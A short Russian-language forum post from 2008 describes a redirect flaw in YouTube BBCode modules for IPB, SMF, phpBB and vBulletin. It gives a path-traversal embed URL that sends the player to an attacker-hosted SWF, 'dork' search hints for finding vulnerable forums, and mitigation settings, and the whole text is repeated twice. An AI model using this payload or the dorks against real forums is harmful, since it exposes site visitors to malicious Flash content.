ettee
24.04.2008, 01:28
В составляющей части существующих модулей отсутствует проверка домена, что дает для атакующего возможность редиректа с помощью getURL.
youtube.com/v/[param_here]
&
$txt['youtube'] = 'YouTube';
Пример:
../redirection?page=http://exploit.swf/
Получение активного редиректа:
http://www.youtube.com/v/../redirection?page=http://exploit.swf/
Присутствие модуля:
IPB
SMF
phpBB
vBulletin
etc
Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение.
dork:
BB Code : /forum/
BB Code : /forum/
youtube.com/v/[param_here]
&
$txt['youtube'] = 'YouTube';
Пример:
../redirection?page=http://exploit.swf/
Получение активного редиректа:
http://www.youtube.com/v/../redirection?page=http://exploit.swf/
Присутствие модуля:
IPB
SMF
phpBB
vBulletin
etc
Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение.
dork:
BB Code : /forum/
BB Code : /forum/